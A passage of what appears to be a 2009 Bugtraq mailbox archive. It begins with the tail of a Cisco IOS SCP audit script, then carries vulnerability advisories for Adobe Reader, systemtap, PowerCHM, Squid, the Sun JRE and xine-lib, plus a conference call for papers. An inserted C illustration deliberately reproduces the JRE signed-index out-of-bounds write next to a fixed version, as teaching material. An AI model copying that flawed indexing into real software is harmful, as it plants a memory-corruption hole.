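    # not change the verdict: the advisory says a low-privileged user who is
    # already permitted by the ACL can still open an SCP session.
    exposed = scp_enabled and bool(views)
    if exposed:
        action = "upgrade to a fixed release or apply 'no ip scp server enable'"
    elif scp_enabled:
        action = "SCP server on, no CLI views found; confirm SCP is needed"
    else:
        action = "none"
    return {
        "scp_server_enabled": scp_enabled,
        "cli_views": views,
        "vty_acl_present": vty_acl,
        "exposed": exposed,
        "action": action,
    }


def audit_all(configs):
    """Audit a mapping of device name -> running-config text."""
    return {name: audit_ios_config(text) for name, text in configs.items()}


if __name__ == "__main__":
    for name, result in audit_all(SAMPLE_CONFIGS).items():
        flag = "EXPOSED" if result["exposed"] else "ok"
        print(f"{name:12} {flag:8} views={result['cli_views']} "
              f"vty_acl={result['vty_acl_present']} -> {result['action']}")
```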

From - Wed Mar 25 15:52:49 2009
Message-ID: <49CA8408.8040000@uni.edu>
Date: Wed, 25 Mar 2009 14:20:40 -0500
From: "Eric C. Lukens" <eric.lukens@uni.edu>
Organization: University of Northern Iowa
User-Agent: Thunderbird 2.0.0.21 (Macintosh/20090302)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: Re: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary Buffer
 Overflow
References: <200903250922.n2P9M5l6016676@ca.secunia.com> <87myb9k10c.fsf@mid.deneb.enyo.de>
In-Reply-To: <87myb9k10c.fsf@mid.deneb.enyo.de>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Status:   

I noticed that as well, but suspected they were notified via more than
one mechanism or had already found the bug internally. I find it funny 
that they had the final code ready on the 28th, but still didn't get it 
out to the public for another 2 weeks.  I suppose they ran it through 
one last QA procedure, or they just don't like to deliver things early.

-Eric

-------- Original Message  --------
Subject: Re: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary 
Buffer Overflow
From: Florian Weimer <fw@deneb.enyo.de>
To: Secunia Research <remove-vuln@secunia.com>
Cc: bugtraq@securityfocus.com
Date: 3/25/09 11:42 AM
> * Secunia Research:
>
>   
>> =====================================================================
>> 5) Solution
>>
>> Update to version 7.1.1, 8.1.4, or 9.1.
>>
>> =====================================================================
>> 6) Time Table
>>
>> 06/03/2009 - Vendor notified.
>> 07/03/2009 - Vendor response.
>> 25/03/2009 - Public disclosure.
>>     
>
> Something doesn't add up because the 9.1 binary I've got was created
> on February 28th, according to Verisign's time stamping signature in
> the Authenticode signature.
>   

-- 
Eric C. Lukens
IT Security Policy and Risk Assessment Analyst
ITS-Network Services
Curris Business Building 15
University of Northern Iowa
Cedar Falls, IA 50614-0121
319-273-7434

From - Wed Mar 25 16:12:49 2009
Date: Wed, 25 Mar 2009 22:55:32 +0300
From: "Vladimir '3APA3A' Dubrovin" <3APA3A@SECURITY.NNOV.RU>
Reply-To: "Vladimir '3APA3A' Dubrovin" <3APA3A@SECURITY.NNOV.RU>
Organization: http://www.security.nnov.ru
X-Priority: 3 (Normal)
Message-ID: <196905565.20090325225532@SECURITY.NNOV.RU>
To: "Eric C. Lukens" <eric.lukens@uni.edu>
Cc: bugtraq@securityfocus.com
Subject: Re[2]: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary Buffer Overflow
In-Reply-To: <49CA8408.8040000@uni.edu>
References: <200903250922.n2P9M5l6016676@ca.secunia.com>
 <87myb9k10c.fsf@mid.deneb.enyo.de> <49CA8408.8040000@uni.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   

Dear Eric C. Lukens,

US-CERT note TA09-051A on this issue being exploited in-the-wild was
issued on February 20.

http://www.us-cert.gov/cas/techalerts/TA09-051A.html

--Wednesday, March 25, 2009, 10:20:40 PM, you wrote to bugtraq@securityfocus.com:

ECL> I noticed that as well, but suspected they were notified via more than
ECL> one mechanism or had already found the bug internally. I find it funny
ECL> that they had the final code ready on the 28th, but still didn't get it
ECL> out to the public for another 2 weeks.  I suppose they ran it through
ECL> one last QA procedure, or they just don't like to deliver things early.

ECL> -Eric

ECL> -------- Original Message  --------
ECL> Subject: Re: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary
ECL> Buffer Overflow
ECL> From: Florian Weimer <fw@deneb.enyo.de>
ECL> To: Secunia Research <remove-vuln@secunia.com>
ECL> Cc: bugtraq@securityfocus.com
ECL> Date: 3/25/09 11:42 AM
>> * Secunia Research:
>>
>>   
>>> =====================================================================
>>> 5) Solution
>>>
>>> Update to version 7.1.1, 8.1.4, or 9.1.
>>>
>>> =====================================================================
>>> 6) Time Table
>>>
>>> 06/03/2009 - Vendor notified.
>>> 07/03/2009 - Vendor response.
>>> 25/03/2009 - Public disclosure.
>>>     
>>
>> Something doesn't add up because the 9.1 binary I've got was created
>> on February 28th, according to Verisign's time stamping signature in
>> the Authenticode signature.
>>   



-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/


From - Wed Mar 25 17:42:49 2009
Date: Wed, 25 Mar 2009 22:16:51 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090325211651.GA4429@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
Subject: [SECURITY] [DSA 1755-1] New systemtap packages fix local privilege escalation
Priority: urgent
Resent-Message-ID: <jP5RnZNJ2FJ.A.PVB.c9pyJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Wed, 25 Mar 2009 21:17:16 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1755-1                  security@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
March 25, 2009                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : systemtap
Vulnerability  : race condition
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2009-0784

Erik Sjoelund discovered that a race condition in the stap tool shipped
by Systemtap, an instrumentation system for Linux 2.6, allows local
privilege escalation for members of the stapusr group.

The old stable distribution (etch) isn't affected.

For the stable distribution (lenny), this problem has been fixed in
version 0.0.20080705-1+lenny1.

For the unstable distribution (sid), this problem has been fixed in
version 0.0.20090314-2.

We recommend that you upgrade your systemtap package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705.orig.tar.gz
    Size/MD5 checksum:   880805 8f14c7b79561392e7ec91187ed09f3be
  http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1.diff.gz
    Size/MD5 checksum:    12603 b08a9943746e474ed2aa6ed4bc9fc438
  http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1.dsc
    Size/MD5 checksum:     1420 bfbaeb5d86bfd6876a04e562dc8c69ec

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_amd64.deb
    Size/MD5 checksum:  1250966 d8368769f30ecaa915839a1fc937899d

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_arm.deb
    Size/MD5 checksum:  1309852 7e006ca8bfa2bd36484bd25dda6dcb4c

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_i386.deb
    Size/MD5 checksum:  1249882 ed02a4eb92c671f18702b69df5ade6d5

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_ia64.deb
    Size/MD5 checksum:  1441448 7da28afa66b41d81322cf5614cb9af93

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_powerpc.deb
    Size/MD5 checksum:  1269934 3016e60eb5dbab1b617bf088d807489c

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_s390.deb
    Size/MD5 checksum:  1227546 9edb1baaa6a126a405674be0a9dcf12c


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAknKnv4ACgkQXm3vHE4uylrGJwCg0zjilkzsim8hlQlZbA66IYPM
o5wAoJh9K6qOLsHRa4CqwJ2eRiK40lkb
=UMKo
-----END PGP SIGNATURE-----

From - Wed Mar 25 18:12:49 2009
User-Agent: Microsoft-Entourage/12.15.0.081119
Date: Wed, 25 Mar 2009 21:58:24 +0100
Subject: CFP RAID 2009
From: Corrado Leita <corrado_leita@symantec.com>
To: <bugtraq@securityfocus.com>
Message-ID: <C5F05980.1B5D%corrado_leita@symantec.com>
Thread-Topic: CFP RAID 2009
Thread-Index: AcmtjG/U0BlktruL2Eag4EbSYyLYcg=
Mime-version: 1.0
Content-type: text/plain;
charset="US-ASCII"
Content-transfer-encoding: 7bit
X-OriginalArrivalTime: 25 Mar 2009 20:58:27.0241 (UTC) FILETIME=[71C32190:01C9AD8C]
Status:   


                         CALL FOR PAPERS
                            RAID 2009

                 12th International Symposium on
          Recent Advances in Intrusion Detection 2009

                     September 23-25, 2009

             Saint Malo, Brittany, France

                http://www.rennes.supelec.fr/RAID2009/

===============================================================

Topics:
-------
This symposium, the 12th in an annual series, brings together leading
researchers and practitioners from academia, government, and industry
to discuss issues and technologies related to intrusion detection and
defense. The Recent Advances in Intrusion Detection (RAID)
International Symposium series furthers advances in intrusion defense
by promoting the exchange of ideas in a broad range of topics. As in
previous years, all topics related to intrusion detection, prevention
and defense systems and technologies are within scope, including but
not limited to the following:

* Network and host intrusion detection and prevention
* Anomaly and specification-based approaches
* IDS cooperation and event correlation
* Malware prevention, detection, analysis and containment
* Web application security
* Insider attack detection
* Intrusion response, tolerance, and self protection
* Operational experience and limitations of current approaches
* Intrusion detection assessment and benchmarking
* Attacks against IDS including DoS, evasion, and IDS discovery
* Formal models, analysis, and standards
* Deception systems and honeypots
* Vulnerability analysis, risk assessment, and forensics
* Adversarial machine learning for security
* Visualization techniques
* Special environments, including mobile and sensor networks
* High-performance intrusion detection
* Legal, social, and privacy issues
* Network exfiltration detection
* Botnet analysis, detection, and mitigation

Important Dates:
----------------
Paper submission deadline:            April 5, 2009
Paper acceptance or rejection:        June  8, 2009
Final paper camera ready copy:        June 18, 2009
Poster abstract submission deadline:  June 20, 2009
Poster acceptance or rejection:       June 28, 2009

Submissions:
------------
RAID 2009 invites two types of submissions:

1. Full papers presenting mature research results or summarizing
   operational experience protecting or monitoring large real-world
   networks. Papers can be 10-20 pages long and, if accepted, they will
   be presented and included in the RAID 2009 proceedings published by
   Springer Verlag in its Lecture Notes in Computer Science
   (http://www.springer.de/comp/lncs/index.html) series. Papers must be
   formatted according to the instructions provided by Springer Verlag
   (http://www.springer.de/comp/lncs/authors.html), and include an
   abstract and a list of keywords.

2. Posters describing innovative ideas not mature enough for a full
   paper and works in progress. A two-page poster abstract formatted as
   a full paper with an abstract must be submitted. If accepted, it
   will be published in the proceedings and the poster will be presented.

All submissions (papers and poster abstracts) must be submitted
electronically; details will be provided on the conference
web site. Papers should list all authors and their affiliations; in case
of multiple authors, the contact author must be indicated (RAID does not
require anonymized submissions).  For accepted papers, it is required
that at least one of the authors attends the conference to present the
paper. Further questions on the submission process may be sent to the
program chair.  Submissions must not substantially duplicate work that
any of the authors has published elsewhere or has submitted in parallel
to a journal or to any other conference or workshop with proceedings.
Simultaneous submission of the same work to multiple venues, submission
of previously published work, and plagiarism constitute dishonesty or
fraud. RAID, like other scientific and technical conferences and journals,
prohibits these practices and may, on the recommendation of the program
chair, take action against authors who have committed them.

Organizing Committee:
---------------------
General Chair: Ludovic Me (Supelec, France, Ludovic.Me@supelec.fr)
Program Chair: Engin Kirda (Eurecom, France, kirda@eurecom.fr)
Program Co-Chair: Somesh Jha (University of Wisconsin, USA, jha@cs.wisc.edu)
Publication Chair: Davide Balzarotti (Eurecom, France,
balzarotti@eurecom.fr)
Publicity Chair: Corrado Leita (Symantec Research Europe,
Corrado_Leita@symantec.com)
Sponsorship Chair: Christophe Bidan (Supelec, France)

Steering Committee:
-------------------
Chair: Marc Dacier (Symantec Research Europe)
Herve Debar (France Telecom R&D)
Deborah Frincke (Pacific Northwest National Lab, USA)
Ming-Yuh Huang (The Boeing Company, USA)
Erland Jonsson (Chalmers)
Wenke Lee (Georgia Institute of Technology)
Ludovic Me (Supelec)
Alfonso Valdes (SRI International)
Giovanni Vigna (University of California, Santa Barbara)
Andreas Wespi (IBM Research, Switzerland)
S. Felix Wu (University of California, Davis)
Diego Zamboni (IBM Research, Switzerland)
Christopher Kruegel (University of California, Santa Barbara)

Program Committee:
-------------------

Anil Somayaji, Carleton University, Canada
Benjamin Morin, Central Directorate for Information System Security (DCSSI), France
Christopher Kruegel, University of California, Santa Barbara, USA
Collin Jackson, Stanford University, USA
Corrado Leita, Symantec Research Europe, France
David Brumley, Carnegie Mellon University, USA
Davide Balzarotti, Eurecom, France
Dongyan Xu, Purdue University, USA
Engin Kirda, Eurecom, France
Giovanni Vigna, University of California, Santa Barbara, USA
Guevara Noubir, Northeastern University, USA
Guofei Gu, Texas A & M University, USA
Jaeyeon Jung, Intel Research, USA
John Viega, Stonewall Software, USA
Jonathan Giffin, Georgia Institute of Technology, USA
Jouni Viinikka, Orange Labs, France
Kathy Wang, MITRE
Manuel Costa, Microsoft Research, Cambridge, UK
Michael Bailey, University of Michigan, USA
Mihai Christodorescu, IBM T.J. Watson, USA
R. Sekar, Stony Brook University, USA
Radu State, University of Luxembourg, Luxembourg
Robert Cunningham, MIT Lincoln Labs
Robin Sommer, International Computer Science Institute, USA
Somesh Jha, University of Wisconsin, USA
Sotiris Ioannidis, FORTH, Greece
Thorsten Holz, University of Mannheim, Germany
Olivier Festor, INRIA Nancy, France
Xuxian Jiang, North Carolina State University, USA

Student Scholarships:
---------------------

RAID 2009 is planning to offer student scholarships to reduce
symposium attendance costs. Students should visit the web site
(http://www.rennes.supelec.fr/RAID2009/) to learn about the possible
availability of scholarships and application deadlines.

Message-ID: <49CB1241.6060905@bkav.com.vn>
Date: Thu, 26 Mar 2009 12:27:29 +0700
From: Bkis <svrt@bkav.com.vn>
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [Bkis-05-2009] PowerCHM Stack-based Buffer Overflow

PowerCHM Stack-based Buffer Overflow

1. General Information

PowerCHM is a tool that can create CHM files from HTML files, text
files, Microsoft Word documents and Adobe Acrobat documents.

In March 2009, Bkis detected a vulnerability in the software,
related to the processing of PowerCHM project files with extension
".HHP". Hackers can exploit this flaw to execute any program, install
viruses, steal private information, and even take control of users'
systems. We sent the report to the vendor.

Details : http://security.bkis.vn/?p65
SVRT Advisory : Bkis-05-2009
Initial vendor notification : 03/14/2009
Release Date : 03/26/2009
Update Date : 03/26/2009
Discovered by : Le Duc Anh, Bkis
Attack Type : Buffer Overflow
Security Rating : Critical
Impact : Code Execution
Affected Software : PowerCHM 5.7 (Prior versions may be also affected)

2. Technical Description

The vulnerability exists in the way that PowerCHM processes CHM project
files. When opening an "HHP" file with an overly long text field such as
[WINDOWS], [FILES], it will lead to a critical stack-based overflow.

Technically, it's very easy for hackers to exploit this flaw. A hacker
might craft an "HHP" file with malicious code embedded and trick users
into opening it. If successful, the hacker might execute arbitrary code
on the affected application.

3. Solution

Rating this vulnerability as high severity, and because the
manufacturer hasn't released any official patch for PowerCHM, Bkis
recommends that users be cautious with "HHP" files from untrustworthy
sources until the vendor releases the patch.

Bkis (www.bkis.vn)


From: Martin Huter <m.huter@phion.com>
Organization: phion AG
To: bugtraq@securityfocus.com
Subject: ICAP adaptation: missing data flow control to client side
Date: Thu, 26 Mar 2009 16:13:32 +0100
Message-ID: <200903261613.33174.m.huter@phion.com>

Summary
=======

Squid proxy's ICAP adaptation is missing data flow control to the client
side. Thus blocking clients may cause a denial of service condition when
requesting huge downloads.

Affected Versions
=================

All squid 3.x versions



Not vulnerable
==============

None of phion's HTTP proxy services (in any version) is affected.


Details
=======

squid's ICAP adaptation implementation does not check the body pipe's
buffer size before reading from an ICAP server.

If the client does not read from the open connection (i.e. the user does not
confirm the browser's download message box in Microsoft's IE), squid keeps on
reading data from the ICAP server into the body pipe, whilst no more data
can be delivered to the client.
Thus the body pipe's buffer is growing and squid may - in the worst case -
consume memory up to the size of the user's download.
Details can be found on http://www.squid-cache.org/bugs/show_bug.cgi?id=2619


Workarounds
===========

None except disabling content adaptation via ICAP.



-- 
Martin Huter
Unit Manager
Release Manager
phion AG
Eduard-Bodem-Gasse 1
A-6020 Innsbruck

Tel:     +43 (0) 508 100
Fax:     +43 (0) 508 100 20
Mail:    m.huter@phion.com
Web:     http://www.phion.com

phion AG
Chairman of the Supervisory Board: Dr. Karl Lamprecht
Executive Board: Dr. Wieland Alge, Mag. Günter Klausner
Registered office: 6020 Innsbruck, Austria
Commercial Court Innsbruck, company register: 184392s
VAT ID no.: ATU47509003
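
Added illustration (not part of the original post, and not Squid's code): the unchecked read described under Details, next to a read that is gated on how much the body pipe already holds. The chunk size, the 64 KiB limit, the download size and the tick-based client model are assumptions made for this simulation.

```c
#include <stddef.h>
#include <stdio.h>

#define CHUNK      4096u                   /* constructed: bytes per read from the ICAP server */
#define PIPE_LIMIT (64u * 1024u)           /* constructed: cap on bytes buffered for the client */
#define DOWNLOAD   (100u * 1024u * 1024u)  /* constructed: size of the requested download */
#define MAX_TICKS  10000000ul              /* safety stop for the simulation loop */

typedef struct {
    size_t peak_buffered;   /* high-water mark of the body pipe buffer */
    size_t delivered;       /* bytes that reached the client */
} pipe_stats;

/*
 * One tick = one pass of the proxy's event loop.
 *   download     bytes the ICAP server will send
 *   stall_ticks  ticks during which the client reads nothing
 *                (e.g. an unanswered download dialog)
 *   client_rate  bytes the client accepts per tick once it reads
 *   flow_control 0: always read from the ICAP server (behaviour in the post)
 *                1: read only if the chunk still fits under PIPE_LIMIT
 */
pipe_stats run_transfer(size_t download, unsigned long stall_ticks,
                        size_t client_rate, int flow_control)
{
    pipe_stats st = {0, 0};
    size_t remaining = download;   /* not yet read from the ICAP server */
    size_t buffered = 0;           /* read, but not yet sent to the client */

    for (unsigned long tick = 0;
         tick < MAX_TICKS && (remaining > 0 || buffered > 0); tick++) {

        /* ICAP server side: pull the next chunk into the body pipe. */
        size_t want = remaining < CHUNK ? remaining : CHUNK;
        int room = !flow_control || buffered + want <= PIPE_LIMIT;
        if (want > 0 && room) {
            buffered += want;
            remaining -= want;
        }
        /* With flow control and no room, the proxy simply does not read;
         * the data stays with the ICAP server until the client drains. */
        if (buffered > st.peak_buffered)
            st.peak_buffered = buffered;

        /* Client side: nothing leaves the pipe while the client is stalled. */
        if (tick >= stall_ticks) {
            size_t out = buffered < client_rate ? buffered : client_rate;
            buffered -= out;
            st.delivered += out;
        }
    }
    return st;
}

int main(void)
{
    pipe_stats unchecked = run_transfer(DOWNLOAD, 30000, 8192, 0);
    pipe_stats gated     = run_transfer(DOWNLOAD, 30000, 8192, 1);

    printf("unchecked read: peak buffer %zu bytes, delivered %zu\n",
           unchecked.peak_buffered, unchecked.delivered);
    printf("gated read:     peak buffer %zu bytes, delivered %zu\n",
           gated.peak_buffered, gated.delivered);
    return 0;
}
```

Both runs deliver the full download; only the peak memory held per stalled client differs, which is the quantity to watch when many clients stall at once.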

Message-ID: <49CBC037.8060007@idefense.com>
Date: Thu, 26 Mar 2009 13:49:43 -0400
From: iDefense Labs <labs-no-reply@idefense.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 03.26.09: Sun Java Runtime Environment
 (JRE) Type1 Font Parsing Integer Signedness Vulnerability

iDefense Security Advisory 03.25.09
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 25, 2009

I. BACKGROUND

The Sun Java JRE is Sun's implementation of the Java runtime. For more
information, see the vendor's site found at the following link.

http://www.java.com

II. DESCRIPTION

Remote exploitation of an integer signedness vulnerability in Sun
Microsystems Inc.'s Java JRE could allow an attacker to execute
arbitrary code with the privileges of the current user.

The vulnerability exists within the font parsing code in the JRE. As
part of its font API, the JRE provides the ability to load a font from
a remote URL.

The vulnerability occurs when parsing glyph description instructions in
the font file. When parsing the glyph descriptions, a 16-bit signed
counter is used as the index to store the next glyph point value. This
counter is compared to a 32-bit value that represents the maximum size
of the heap buffer. Under certain conditions, the 16-bit counter will be
interpreted as a negative value, which allows the attacker to store data
before the allocated buffer.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code in the context
of the currently logged-on user. To exploit this vulnerability, a
targeted user must load a malicious Web page created by an attacker. An
attacker typically accomplishes this via social engineering or injecting
content into compromised, trusted sites.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Sun
Microsystems Inc.'s Java JRE version 1.6.0_11 for Windows. Previous
versions and versions for other platforms may also be affected.

Sun Microsystems reports that the vulnerability can occur in the
following Java SE and Java SE for Business releases for Windows,
Solaris, and Linux:

    * JDK and JRE 6 Update 12 and earlier
    * JDK and JRE 5.0 Update 17 and earlier

V. WORKAROUND

There is a potential workaround for the vulnerability, but it renders
the JRE unusable. It is possible to use the cacls program to change the
file permissions on fontmanager.dll. This will prevent the vulnerable
library from loading. This workaround can be applied with the following
command line:

echo y| cacls "C:\Program Files\Java\**JRE_VERSION**\bin\fontmanager.dll" /E /P everyone:N

However, this workaround has a serious impact on the functionality of
the JRE. When a webpage attempts to load an applet, the JRE will abort
with a runtime error, and the browser will close.

VI. VENDOR RESPONSE

Sun Microsystems Inc. has released a patch which addresses this issue.
For more information, consult their advisory at the following URL:

http://sunsolve.sun.com/search/document.do?assetkey=1-66-254571-1

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

02/18/2009  - Initial Contact
02/18/2009  - PoC Requested
02/19/2009  - PoC Sent
03/10/2009  - Disclosure Date Set
03/25/2009  - Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
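
Added illustration (not part of the iDefense advisory, and not JRE code): the comparison described in section II, where a 16-bit signed counter is checked only against a 32-bit upper limit, next to a corrected check. The buffer capacity, the guard area and all names are constructed for this demo; stores that would land before the buffer fall into the guard area so they can be counted safely.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CAPACITY 40000   /* constructed: point slots in the buffer (more than INT16_MAX) */
#define GUARD    32768   /* cells placed in front of the buffer to catch underflow */

/* The "heap buffer" is arena[GUARD .. GUARD+CAPACITY-1]; the cells below GUARD
 * stand in for whatever memory precedes the real allocation. */
static uint8_t arena[GUARD + CAPACITY];

/* Advance a 16-bit signed counter with two's-complement wraparound, computed
 * in wider types so the demo itself has no implementation-defined step. */
static int16_t next16(int16_t v)
{
    uint16_t raw = (uint16_t)((uint16_t)v + 1u);
    return (int16_t)(raw >= 0x8000u ? (int32_t)raw - 0x10000 : (int32_t)raw);
}

/* Number of guard cells that were written, i.e. stores before the buffer. */
long guard_cells_written(void)
{
    long n = 0;
    for (int i = 0; i < GUARD; i++)
        n += arena[i];
    return n;
}

/* Flawed pattern: the index is int16_t, the limit is int32_t. The comparison
 * promotes the index to int, so a wrapped (negative) index is still "less
 * than" the limit and the store is accepted. Returns how many stores were
 * accepted with a negative index. */
long store_points_flawed(long npoints, int32_t max_points)
{
    int16_t idx = 0;
    long before = 0;

    memset(arena, 0, sizeof arena);
    for (long i = 0; i < npoints; i++) {
        if (idx < max_points) {          /* upper bound only, no sign check */
            arena[GUARD + idx] = 1;      /* idx < 0 lands in the guard area */
            if (idx < 0)
                before++;
        }
        idx = next16(idx);               /* 32767 + 1 becomes -32768 */
    }
    return before;
}

/* Corrected pattern: index and limit share one unsigned 32-bit type, and the
 * input is rejected at the first point that does not fit. Returns the number
 * of points stored, or -1 if the input was rejected. */
long store_points_checked(long npoints, uint32_t max_points)
{
    uint32_t idx = 0;

    memset(arena, 0, sizeof arena);
    for (long i = 0; i < npoints; i++) {
        if (idx >= max_points || idx >= (uint32_t)CAPACITY)
            return -1;                   /* reject the glyph, do not clamp */
        arena[GUARD + idx] = 1;
        idx++;
    }
    return (long)idx;
}

int main(void)
{
    long before = store_points_flawed(40000, CAPACITY);
    printf("flawed:  %ld stores before the buffer (%ld guard cells hit)\n",
           before, guard_cells_written());

    long stored = store_points_checked(40000, CAPACITY);
    printf("checked: %ld points stored, %ld guard cells hit\n",
           stored, guard_cells_written());
    printf("checked, one point too many: %ld\n",
           store_points_checked(40001, CAPACITY));
    return 0;
}
```

The flawed variant only misbehaves once the point count exceeds 32767, so test inputs with small glyphs never reach the wrapped index.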

Subject: [USN-746-1] xine-lib vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Date: Thu, 26 Mar 2009 15:27:37 -0400
Message-Id: <1238095657.13798.5.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-746-1             March 26, 2009
xine-lib vulnerability
CVE-2009-0698, https://launchpad.net/bugs/322834
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libxine-main1                   1.1.1+ubuntu2-7.11

Ubuntu 7.10:
  libxine1                        1.1.7-1ubuntu1.5

Ubuntu 8.04 LTS:
  libxine1                        1.1.11.1-1ubuntu3.3

Ubuntu 8.10:
  libxine1                        1.1.15-0ubuntu3.2

After a standard system upgrade you need to restart applications linked
against xine-lib, such as Totem-xine and Amarok, to effect the necessary
changes.

Details follow:

It was discovered that the 4xm demuxer in xine-lib did not correctly handle
a large current_track value in a 4xm file, resulting in an integer
overflow. If a user or automated system were tricked into opening a
specially crafted 4xm movie file, an attacker could crash xine-lib or
possibly execute arbitrary code with the privileges of the user invoking
the program. (CVE-2009-0698)

USN-710-1 provided updated xine-lib packages to fix multiple security
vulnerabilities. The security patch to fix CVE-2008-5239 introduced a
regression causing some media files to be unplayable. This update corrects
the problem. We apologize for the inconvenience.

Original advisory details:
 It was discovered that the input handlers in xine-lib did not correctly
 handle certain error codes, resulting in out-of-bounds reads and heap-
 based buffer overflows. If a user or automated system were tricked into
 opening a specially crafted file, stream, or URL, an attacker could
 execute arbitrary code as the user invoking the program. (CVE-2008-5239)


Updated packages for Ubuntu 6.06 LTS:

Updated packages for Ubuntu 7.10:

Updated packages for Ubuntu 8.04 LTS:

    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.3_sparc.deb
      Size/MD5:     1316 32a1e3ae3a9b429013584199b7b532da
    http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.3_sparc.deb
      Size/MD5:   400868 b14d7a5f3b97a352315b5e71259f5e4f
    http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.3_sparc.deb
      Size/MD5:    14630 fcf714decbc9aa6eb4a0b3c13f4dd3a6

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.15-0ubuntu3.2.diff.gz
      Size/MD5:    41254 77d55801338fe1289c394d0fcc45da90
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.15-0ubuntu3.2.dsc
      Size/MD5:     2335 cf427ca913569cfa1ffb289a3449828a
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.15.orig.tar.gz
      Size/MD5:  9102819 a270252e1a1342e83d1596e2d42a7282

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-doc_1.1.15-0ubuntu3.2_all.deb
      Size/MD5:   145436 9956a80c0d4455b62e7f97efd71da5ef
